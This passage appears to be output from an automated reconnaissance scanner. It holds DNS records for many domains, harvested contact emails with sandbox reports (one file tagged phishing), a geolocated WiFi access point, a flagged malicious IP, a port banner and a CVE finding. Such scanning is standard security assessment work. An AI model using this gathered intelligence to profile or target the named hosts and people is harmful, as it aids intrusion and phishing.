"CNAME", "resolved_at": "2023-02-26T21:11:31.059545269Z"}, "web-dev.docs.inditex.dev": {"record_type": "CNAME", "resolved_at": "2023-03-04T15:55:36.047967881Z"}, "greshnikov.net": {"record_type": "AAAA", "resolved_at": "2023-04-19T21:42:27.985888825Z"}, "svelte.calories.claas.dev": {"record_type": "CNAME", "resolved_at": "2023-04-04T16:51:51.844422366Z"}, "namco.dev": {"record_type": "AAAA", "resolved_at": 
"2023-01-19T14:14:45.143590011Z"}, "www.tcamba.dev": {"record_type": "CNAME", "resolved_at": "2023-03-23T17:56:56.616082497Z"}, "thaecohvah.syntactic-sugar.design": {"record_type": "CNAME", "resolved_at": "2023-04-23T09:37:19.694810939Z"}, "liangxiayi.com": {"record_type": "CNAME", "resolved_at": "2023-03-04T14:30:08.595680200Z"}, "mst.biuxbiu.design": {"record_type": "CNAME", "resolved_at": "2023-04-28T17:39:08.436586135Z"}, "kbau.dev": {"record_type": "AAAA", "resolved_at": "2023-02-27T15:42:55.285099290Z"}, "www.kazusato.dev": {"record_type": "CNAME", "resolved_at": "2023-03-05T15:53:18.300056949Z"}, "cuillere.dev": {"record_type": "AAAA", "resolved_at": "2023-04-24T16:59:59.805050461Z"}, "www.srinivasreddy.dev": {"record_type": "CNAME", "resolved_at": "2023-03-02T15:51:53.148982927Z"}, "www.cliu.dev": {"record_type": "CNAME", "resolved_at": "2023-03-24T23:25:10.893500128Z"}, "kaiseki.coderfin.dev": {"record_type": "CNAME", "resolved_at": "2023-03-13T16:02:42.934790176Z"}, "www.robisonweb.dev": {"record_type": "CNAME", "resolved_at": "2023-02-28T15:51:22.213479983Z"}, "www.biobyelogy.com": {"record_type": "CNAME", "resolved_at": "2023-02-21T13:52:36.509893227Z"}, "trubbylove.laury.dev": {"record_type": "CNAME", "resolved_at": "2023-03-22T00:18:26.457996047Z"}, "blog.hiluohao.com": {"record_type": "CNAME", "resolved_at": "2023-03-28T14:57:36.831718722Z"}, "www.yusry.de": {"record_type": "CNAME", "resolved_at": "2023-04-23T16:48:40.403075909Z"}, "data-observability-tag.docs.inditex.dev": {"record_type": "CNAME", "resolved_at": "2023-03-19T15:35:12.630016737Z"}, "siuts.proekspert.ee": {"record_type": "CNAME", "resolved_at": "2023-02-08T17:06:34.527975069Z"}, "www.zaddytech.com": {"record_type": "CNAME", "resolved_at": "2023-01-28T14:19:48.513264436Z"}, "www.dannytran.dev": {"record_type": "CNAME", "resolved_at": "2023-03-17T15:48:34.941987381Z"}, "www.breakingtheboycode.com": {"record_type": "CNAME", "resolved_at": "2023-03-19T23:07:16.593181704Z"}, 
"yanshouwang.dev": {"record_type": "AAAA", "resolved_at": "2023-03-21T00:21:54.271513621Z"}, "www.hiennguyen.dev": {"record_type": "CNAME", "resolved_at": "2023-03-07T12:59:42.443779889Z"}, "fikihfirmansyah.my.id": {"record_type": "AAAA", "resolved_at": "2023-03-01T16:36:29.300419626Z"}, "database.jiny.dev": {"record_type": "CNAME", "resolved_at": "2023-03-21T00:19:55.315272389Z"}, "www.shaneporter.dev": {"record_type": "CNAME", "resolved_at": "2023-03-21T00:20:35.708785655Z"}, "blog.brandonmathis.me": {"record_type": "CNAME", "resolved_at": "2023-03-21T21:08:33.485121539Z"}, "blog.limeira.dev": {"record_type": "CNAME", "resolved_at": "2023-03-02T15:51:35.974650849Z"}, "v1.commandtech.dev": {"record_type": "CNAME", "resolved_at": "2022-10-31T15:01:33.036179596Z"}, "nfshibes.com": {"record_type": "AAAA", "resolved_at": "2023-04-19T17:29:58.637558645Z"}, "help.programm-chest.dev": {"record_type": "CNAME", "resolved_at": "2022-11-30T14:37:46.643013242Z"}, "flagicons.lipis.dev": {"record_type": "CNAME", "resolved_at": "2023-03-19T15:35:16.844777559Z"}, "www.aashish.dev": {"record_type": "CNAME", "resolved_at": "2023-04-19T19:07:09.565393850Z"}, "mick.maccallum.dev": {"record_type": "CNAME", "resolved_at": "2023-02-22T16:19:47.687126527Z"}, "hkatz.dev": {"record_type": "AAAA", "resolved_at": "2023-03-22T11:14:05.854477536Z"}, "www.matthewpereira.com": {"record_type": "CNAME", "resolved_at": "2023-03-25T21:28:16.599843999Z"}, "daniel.zaturensky.com": {"record_type": "CNAME", "resolved_at": "2023-03-22T00:13:57.894038790Z"}, "steezeburger.com": {"record_type": "CNAME", "resolved_at": "2023-03-19T14:57:50.497448263Z"}, "resume.chann.dev": {"record_type": "CNAME", "resolved_at": "2023-03-20T16:16:20.658403265Z"}, "www.wazted.fr": {"record_type": "CNAME", "resolved_at": "2023-05-11T17:32:27.312675959Z"}, "www.changkaixin.cn": {"record_type": "CNAME", "resolved_at": "2023-03-22T16:00:04.814716347Z"}, "www.mtconnectcore.dev": {"record_type": "CNAME", "resolved_at": 
"2023-03-16T14:59:11.184709249Z"}, "www.aloha.org.cn": {"record_type": "CNAME", "resolved_at": "2022-12-14T12:40:48.602824216Z"}, "www.williamjang.dev": {"record_type": "CNAME", "resolved_at": "2023-03-11T15:47:39.271340346Z"}, "www.mangato.es": {"record_type": "CNAME", "resolved_at": "2023-04-22T16:31:05.591550189Z"}, "msk.im": {"record_type": "AAAA", "resolved_at": "2023-05-09T17:24:25.369430576Z"}, "status.brioxr.com": {"record_type": "CNAME", "resolved_at": "2023-01-19T12:58:47.712783317Z"}, "stevenbone.dev": {"record_type": "AAAA", "resolved_at": "2023-04-20T02:37:36.462044411Z"}, "www.dwivedula.dev": {"record_type": "CNAME", "resolved_at": "2023-03-07T15:37:48.541873098Z"}, "www.bt1024.com": {"record_type": "CNAME", "resolved_at": "2023-03-09T21:39:30.209694773Z"}, "willj.dev": {"record_type": "AAAA", "resolved_at": "2023-03-21T00:21:22.173071262Z"}, "www.ousmane.dev": {"record_type": "CNAME", "resolved_at": "2023-03-22T15:03:29.723057364Z"}, "www.srcmax.com": {"record_type": "CNAME", "resolved_at": "2023-03-26T22:27:47.504722812Z"}, "www.shira.dev": {"record_type": "CNAME", "resolved_at": "2023-03-22T17:45:59.585738764Z"}, "static.projectcodex.co": {"record_type": "CNAME", "resolved_at": "2023-03-28T12:56:47.903477609Z"}, "www.thyagajan.in": {"record_type": "CNAME", "resolved_at": "2023-02-04T15:11:06.016790048Z"}, "www.lawrencedunbar.dev": {"record_type": "CNAME", "resolved_at": "2023-03-08T15:50:22.533060749Z"}, "www.jenniwu.dev": {"record_type": "CNAME", "resolved_at": "2023-04-24T17:00:00.073227865Z"}, "blog.ddamy.com": {"record_type": "CNAME", "resolved_at": "2023-03-18T21:10:57.323553779Z"}, "www.coltonfalkner.dev": {"record_type": "CNAME", "resolved_at": "2023-03-22T19:22:40.169282211Z"}, "www.brandonfajardo.com": {"record_type": "CNAME", "resolved_at": "2023-03-12T13:33:44.576384321Z"}, "andressa.dev": {"record_type": "CNAME", "resolved_at": "2023-04-13T16:15:01.948884742Z"}, "www.pepijn.tech": {"record_type": "CNAME", "resolved_at": 
"2023-03-11T19:36:20.068693758Z"}, "www.dangillis.dev": {"record_type": "CNAME", "resolved_at": "2023-03-05T15:53:20.930987816Z"}, "www.jasonscotto.dev": {"record_type": "CNAME", "resolved_at": "2023-03-16T04:01:31.543104004Z"}, "www.ologn.dev": {"record_type": "CNAME", "resolved_at": "2023-02-14T15:37:29.279040979Z"}, "sam.haslers.info": {"record_type": "CNAME", "resolved_at": "2023-03-12T15:51:38.197844277Z"}, "www.sreehari.dev": {"record_type": "CNAME", "resolved_at": "2023-03-14T15:27:59.231327405Z"}, "mteworld.ml": {"record_type": "AAAA", "resolved_at": "2023-01-04T15:21:01.487028696Z"}, "www.bsaiki.com": {"record_type": "CNAME", "resolved_at": "2023-03-05T13:41:36.534443343Z"}, "www.grantanna.dev": {"record_type": "CNAME", "resolved_at": "2023-02-27T15:42:47.651834600Z"}, "mirror.growingio.design": {"record_type": "CNAME", "resolved_at": "2022-12-20T14:28:15.483007528Z"}, "www.framy.dev": {"record_type": "CNAME", "resolved_at": "2023-03-04T15:55:45.611656444Z"}, "www.colorbuilder.dev": {"record_type": "CNAME", "resolved_at": "2023-03-17T15:48:32.011890468Z"}, "www.oscarablinger.dev": {"record_type": "CNAME", "resolved_at": "2023-05-01T09:06:38.146245867Z"}, "abeziou.dev": {"record_type": "AAAA", "resolved_at": "2023-03-27T23:40:41.232028838Z"}, "ulim216.cf": {"record_type": "AAAA", "resolved_at": "2023-02-19T12:42:56.171125280Z"}, "www.bytememo.com": {"record_type": "CNAME", "resolved_at": "2023-04-16T14:20:53.377584664Z"}, "bolifestudio.com": {"record_type": "CNAME", "resolved_at": "2023-04-01T14:40:33.850493899Z"}, "www.linking.fun": {"record_type": "CNAME", "resolved_at": "2023-03-28T17:44:25.016248815Z"}, "www.candidatekey.com": {"record_type": "CNAME", "resolved_at": "2023-03-22T18:28:28.538888119Z"}, "shop4data-ui.docs.collibra.dev": {"record_type": "CNAME", "resolved_at": "2023-03-22T00:18:31.647476511Z"}, "carlelbaz.com": {"record_type": "CNAME", "resolved_at": "2023-05-05T14:11:09.059299062Z"}, "www.codar.dev": {"record_type": "CNAME", "resolved_at": 
"2023-03-22T07:54:18.450070838Z"}, "www.ky1vstar.dev": {"record_type": "CNAME", "resolved_at": "2023-03-11T15:47:22.392376650Z"}, "portfolio.gchahm.dev": {"record_type": "CNAME", "resolved_at": "2023-01-14T14:40:10.714963428Z"}}, "names": ["www.pixeli.dev", "www.thyagajan.in", "www.jenniwu.dev", "abeziou.dev", "web-dev.docs.inditex.dev", "blog.hiluohao.com", "www.bsaiki.com", | 2606:50c0:8002::153 |
| 2023-05-12 02:44:25 | IPv6 Address | No | DNS Resolver | 15 | 0 | 3 | 0 | None | 2600:1f18:2489:8202::c8 | pics.battleb0t.xyz |
| 2023-05-12 03:00:27 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 3 | 0 | None | occipy.recrutement@aftral.com | [{u'subsystem': None, u'classification_tags': [u'phishing'], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 2, u'threat_score': 100, u'compromised_hosts': [], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'MSG-993046.html', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_3fc_IESQMMUTEX_0_519"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_1020"\n "IsoScope_3fc_IESQMMUTEX_0_519"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "Local\\ZonesLockedCacheCounterMutex"\n "IsoScope_3fc_IESQMMUTEX_0_303"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "Local\\ZonesCacheCounterMutex"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "IsoScope_3fc_ConnHashTable<1020>_HashTable_Mutex"\n "IsoScope_3fc_IE_EarlyTabStart_0x9c4_Mutex"\n "UpdatingNewTabPageData"\n "IsoScope_3fc_IESQMMUTEX_0_331"\n "Local\\VERMGMTBlockListFileMutex"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"cdnjs.cloudflare.com"\n "getbootstrap.com"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': 
u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"185.199.109.153:443"\n "104.17.25.14:443"\n "172.67.30.148:443"\n "65.8.158.55:443"'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")\n Antivirus vendors marked dropped file "Tar1189.tmp" as clean (type is "data")\n Antivirus vendors marked dropped file "Tar1178.tmp" as clean (type is "data")'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-5', u'name': u'Drops cabinet archive files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'"Cab1177.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62582 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: 00000000-00001020]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00002584]\n "Tar1189.tmp" has type "data"- Location: [%TEMP%\\Tar1189.tmp]- [targetUID: 00000000-00002584]\n 
"HTTJFRWH.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\HTTJFRWH.txt]- [targetUID: 00000000-00001020]\n "_172C582D-B9D2-11ED-B010-08002708D069_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: 00000000-00001020]\n "search_2_.json" has type "JSON data"- [targetUID: 00000000-00001020]\n "52H103H9.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\52H103H9.txt]- [targetUID: 00000000-00001020]\n "RYIH22IO.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\RYIH22IO.txt]- [targetUID: 00000000-00001020]\n "~DFD0DF213BBF0CD101.TMP" has type "data"- Location: [%TEMP%\\~DFD0DF213BBF0CD101.TMP]- [targetUID: 00000000-00001020]\n "Cab1177.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62582 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"- Location: [%TEMP%\\Cab1177.tmp]- [targetUID: 00000000-00002584]\n "search__0633EE93-D776-472f-A0FF-E1416B8B2E3A_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: 00000000-00001020]\n "floating-labels_1_.css" has type "ASCII text"- [targetUID: 00000000-00001020]\n "K4HM6RP3.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\K4HM6RP3.txt]- [targetUID: 00000000-00001020]\n "Tar1178.tmp" has type "data"- Location: [%TEMP%\\Tar1178.tmp]- [targetUID: 00000000-00002584]\n "bootstrap.min_1_.css" has type "ASCII text with very long lines"- [targetUID: 00000000-00001020]\n "favicon_3_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: 00000000-00001020]\n "GXM745UA.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\GXM745UA.txt]- [targetUID: 00000000-00001020]\n "favicon_4_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: 00000000-00001020]\n "core.min_1_.js" has type "ASCII text with very long lines with no line 
terminators"- [targetUID: 00000000-00001020]\n "en-US.4" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Internet Explorer\\DomainSuggestions\\en-US.4]- [targetUID: 00000000-00001020]'}, {u'category': u'Network Related', u'origin': u'Network Traffic', u'identifier': u'network-6', u'name': u'Contacts Random Domain Names', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 5, u'threat_level': 0, u'type': 7, u'description': u'"cdnjs.cloudflare.com" seems to be random'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-102', u'name': u'Decrypted SSL network traffic', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1573', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1573', u'relevance': 3, u'threat_level': 0, u'type': 2, u'description': u'"GET /zepto.min.js HTTP/1.1\nAccept: application/javascript, */*;q=0.8\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: zeptojs.com\nDNT: 1\nConnection: Keep-Alive"\n [gzip-compressed response body: binary data omitted, not reproducible as text] |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | Maxx Hotel (Net ID: 00:02:2D:1F:6F:03) | 50.1188, 8.6843 |
| 2023-05-12 03:00:00 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 3 | 0 | None | contact@luckycarrotapp.com | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'https://urldefense.com/v3/__https:/luckycarrotapp.com/organization-b2__;!!FBg0PJ8GdnjP4Q!8c3hK7I-XFYCk7Nsu_a_9ZxOtOzs4BD4Qzz4xaaEEmIdhXPGsEafhFGfqwLPGWafWHCBltJqzsIwT7XW_a2-1-v3BYjmMONK6mxg0p8$', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_f94_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "Local\\ZonesLockedCacheCounterMutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "IsoScope_f94_IESQMMUTEX_0_519"\n "IsoScope_f94_IESQMMUTEX_0_303"\n "UpdatingNewTabPageData"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "Local\\VERMGMTBlockListFileMutex"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3988"\n "IsoScope_f94_IESQMMUTEX_0_331"\n "IsoScope_f94_IE_EarlyTabStart_0xe00_Mutex"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "Local\\ZonesCacheCounterMutex"\n "IsoScope_f94_ConnHashTable<3988>_HashTable_Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\UpdatingNewTabPageData"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesCacheCounterMutex"\n "\\Sessions\\1\\BaseNamedObjects\\{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', 
u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"35.80.202.17:443"\n "172.66.43.26:443"\n "20.38.109.4:443"\n "104.16.187.65:443"\n "104.18.230.83:443"\n "185.199.109.153:443"\n "104.18.136.59:443"\n "157.240.22.25:443"\n "104.16.121.190:443"\n "77.88.21.119:443"\n "104.18.25.196:443"\n "104.17.99.172:443"\n "104.16.136.206:443"\n "74.125.137.156:443"\n "104.19.154.83:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"api.producthunt.com"\n "assets.calendly.com"\n "buttons.github.io"\n "connect.facebook.net"\n "js.hs-analytics.net"\n "js.hs-banner.com"\n "js.hs-scripts.com"\n "js.hsadspixel.net"\n "js.hsforms.net"\n "js.usemessages.com"\n "luckycarrot.blob.core.windows.net"\n "mc.yandex.com"\n "mc.yandex.ru"\n "stats.g.doubleclick.net"\n "track.hubspot.com"\n "urldefense.com"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-10', u'name': u'Found a reference to a known community page', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 7, u'threat_level': 0, u'type': 2, u'description': u'"<meta property="twitter:image" content="https://luckycarrotapp.com/images/carrot-logo1111.png">" (Indicator: "twitter")\n "<meta property="twitter:title" content="Peer to peer recognition" />" (Indicator: "twitter")\n "<meta property="twitter:description" content="The best way to recognize and reward employees for their hard work. Boost employee engagement and motivation with Lucky Carrot." 
/>" (Indicator: "twitter")\n "<img height="1" width="1" src="https://www.facebook.com/tr?id=2186666338068573&ev=PageView&noscript=1" alt="facebook" />" (Indicator: "facebook.com")\n "<button class="button btn-fill-orange watch-video-btn video-modal" title="Watch a Video" data-video="https://www.youtube.com/embed/d4_e3pCgUW8?autoplay=1">" (Indicator: "youtube")\n "<a href="https://www.facebook.com/EmployeeEngagementPlatform/" target="_blank">" (Indicator: "facebook.com")\n "<a href="https://am.linkedin.com/company/luckycarrot" target="_blank">" (Indicator: "linkedin.com")\n "<a href="https://www.youtube.com/channel/UCb0UW89RRlZK6jZQUT3SRHQ" target="_blank">" (Indicator: "youtube")\n "<img src="/images/newLandingPage/icons/social-icons/youtube-icon.svg" />" (Indicator: "youtube")\n "<a href="https://mobile.twitter.com/carrot_lucky" target="_blank">" (Indicator: "twitter")\n "<img src="/images/newLandingPage/icons/social-icons/twitter-icon.svg" />" (Indicator: "twitter")\n ""https://www.facebook.com/rewardsmadefunagain/"," (Indicator: "facebook.com")\n ""https://twitter.com/carrot_lucky"," (Indicator: "twitter")\n ""https://www.youtube.com/channel/UCb0UW89RRlZK6jZQUT3SRHQ"," (Indicator: "youtube")\n ""https://www.linkedin.com/company/13047360"" (Indicator: "linkedin.com")\n "<img height="1" width="1" style="display:none;" alt="" src="https://px.ads.linkedin.com/collect/?pid=1512212&fmt=gif" />" (Indicator: "linkedin.com")\n "{state:0,transportUrl:b,context:c,parent:Wk()},P(91);else{var f="/gtag/destination?id="+encodeURIComponent(a)+"&l="+Jh.ja+"&cx=c";Tr()&&(f+="&sign="+Jh.Xe);var g=Sh||ci?Sr(b,f):void 0;g||(g=Fo("https://","http://",Jh.ze+f));Qk().destination[a]={state:1,context:c,parent:Wk()};mc(g)}};function Ur(){if(Ok()){return!0}return!1};var Xr=new 
RegExp(/^(.*\\.)?(google|youtube|blogger|withgoogle)(\\.com?)?(\\.[a-z]{2})?\\.?$/),Yr={cl:["ecl"],customPixels:["nonGooglePixels"],ecl:["cl"],ehl:["hl"],hl:["ehl"],html:["customScripts","customPixels","nonGooglePixels","nonGoogleScripts","nonGoogleIframes"],customScripts:["html","customPixels","nonGooglePixels","nonGoogleScripts","nonGoogleIframes"],nonGooglePixels:[],nonGoogleScripts:["nonGooglePixels"],nonGoogleIframes:["nonGooglePixels"]},Zr={cl:["ecl"],customPixels:["customScripts","html"]," (Indicator: "youtube")\n "var Jv=function(a,b,c){function d(){var g=a();f+=e?(Ua()-e)*g.playbackRate/1E3:0;e=Ua()}var e=0,f=0;return{createEvent:function(g,h,m){var n=a(),p=n.Lg,q=void 0!==m?Math.round(m):void 0!==h?Math.round(n.Lg*h):Math.round(n.Pi),r=void 0!==h?Math.round(100*h):0>=p?0:Math.round(q/p*100),t=G.hidden?!1:.5<=Pi(c);d();var u=void 0;void 0!==b&&(u=[b]);var v=lv(c,"gtm.video",u);v["gtm.videoProvider"]="youtube";v["gtm.videoStatus"]=g;v["gtm.videoUrl"]=n.url;v["gtm.videoTitle"]=n.title;v["gtm.videoDuration"]=" (Indicator: "youtube")\n "b,"vert.pix");break;case "PERCENT":qy(d.verticalThresholds,b,"vert.pct")}pv("sdl","init",!1)?pv("sdl","pending",!1)||I(function(){return ry()}):(nv("sdl","init",!0),nv("sdl","pending",!0),I(function(){ry();if(sy()){var e=ty();qc(z,"scroll",e);qc(z,"resize",e)}else nv("sdl","init",!1)}));return b}xy.N="internal.enableAutoEventOnScroll";var cc=ea(["data-gtm-yt-inspected-"]),yy=["www.youtube.com","www.youtube-nocookie.com"],zy,Ay=!1;" (Indicator: "youtube")\n "m=!!a.get("fixMissingApi");if(!(d||e||f||g.length||h.length))return;var n={Gg:d,Eg:e,Fg:f,lh:g,mh:h,Wd:m,ib:b},p=z.YT,q=function(){Gy(n)};if(p)return p.ready&&p.ready(q),b;var r=z.onYouTubeIframeAPIReady;z.onYouTubeIframeAPIReady=function(){r&&r();q()};I(function(){for(var t=G.getElementsByTagName("script"),u=t.length,v=0;v<u;v++){var w=t[v].getAttribute("src");if(Jy(w,"iframe_api")||Jy(w,"player_api"))return b}for(var 
x=G.getElementsByTagName("iframe"),y=x.length,A=0;A<y;A++)if(!Ay&&Hy(x[A],n.Wd))return mc("https://www.youtube.com/iframe_api")," (Indicator: "youtube")'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"golden-kitty-badge_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "lucky%20carrot%20logo_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "bring-visibility_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "mini-teams-icon_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "message-icon_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "build-a-recognition-culture_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "promote-core-values_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "mail_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "mini-slack-icon_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "instagram-icon_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "min-jira-icon_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "rewards-as-experiences_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n 
"twitter-icon_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "youtube-icon_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "linkedin-icon_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "facebook-icon_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "min-zoom-icon_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "video-play_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "Icon-feather-check-orange_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "urlblockindex_1_.bin" has type "data"- [targetUID: N/A]'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-39' |
| 2023-05-12 02:54:18 | Linked URL - Internal | No | Web Spider | 34 | 0 | 2 | 0 | None | https://pics.battleb0t.xyz/ | pics.battleb0t.xyz |
| 2023-05-12 02:45:32 | Malicious IP Address | Yes | PhishStats | 0 | 1 | 2 | 0 | None | Phishstats [185.199.109.153] | 185.199.109.153 |
| 2023-05-12 02:55:01 | Open TCP Port Banner | No | Censys | 0 | 0 | 2 | 0 | None | HTTP/1.1 403 Forbidden
Date: <REDACTED>
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
X-Frame-Options: SAMEORIGIN
Referrer-Policy: same-origin
Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Vary: Accept-Encoding
Server: cloudflare
CF-RAY: 7c5bed4978fe2c9b-ORD
Content-Encoding: gzip
| 188.114.96.1 |
| 2023-05-12 03:02:53 | Vulnerability - CVE Medium | Yes | Tool - testssl.sh | 0 | 1 | 2 | 0 | None | CVE-2013-3587
https://nvd.nist.gov/vuln/detail/CVE-2013-3587
Score: 5.9
